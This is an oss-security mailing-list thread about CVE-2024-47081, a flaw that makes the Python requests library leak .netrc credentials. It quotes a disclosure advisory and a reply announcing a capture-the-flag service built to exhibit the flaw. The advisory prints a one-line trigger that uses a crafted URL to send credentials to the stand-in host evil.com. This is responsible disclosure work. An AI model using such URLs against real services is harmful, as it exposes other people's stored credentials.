Re: [oss-security] CVE-2024-47081: Netrc credential leak in PSF requests library

Tue, 03 Jun 2025 16:19:17 -0700 

Hi,

Well, it's probably just a coincidence, but I literally just spun up a web
service that does exactly this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one
in ~/.netrc:

```
machine localhost
login *REDACTED*
password CTF{*REDACTED*}
```

It's not ideal that requests automatically slurps credentials from ~/.netrc
and leaks them, even when my code never references it. It's possible that
the netrc is on the same server from a different application, developer
debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun.  I'll keep it
online for a couple of weeks, or until the VC money runs out.

Thanks

--
Kind Regards,
Dave Walker

On Tue, 3 Jun 2025 at 18:12, Alan Coopersmith <alan.coopersm...@oracle.com>
wrote:

> [I'm not sure how the attacker is supposed to get the victim to make a
>   requests call using a URL the attacker controls, but that didn't stop
>   them from getting a CVE issued for this. -alan- ]
>
>
> -------- Forwarded Message --------
> Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
> Date: Sat, 31 May 2025 06:30:50 +0000
> From: Juho Forsén via Fulldisclosure <fulldisclos...@seclists.org>
> Reply-To: Juho Forsén <jupe...@protonmail.ch>
> To: fulldisclos...@seclists.org <fulldisclos...@seclists.org>
>
> The PSF requests library (https://github.com/psf/requests &
> https://pypi.org/project/requests/) leaks .netrc credentials to third
> parties due to incorrect URL processing under specific conditions.
>
> Issuing the following API call triggers the vulnerability:
>
>    requests.get('http://example.com:@evil.com/')
>
> Assuming .netrc credentials are configured for example.com, they are
> leaked to evil.com by the call.
>
> The root cause is
> https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
>
> The vulnerability was originally reported to the library maintainers on
> September 12, 2024, but no fix is available. CVE-2024-47081 has been
> reserved by GitHub for this issue.
>
> As a workaround, clients may explicitly specify the credentials used on
> every API call to disable .netrc access.
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: https://seclists.org/fulldisclosure/
>

Reply via email to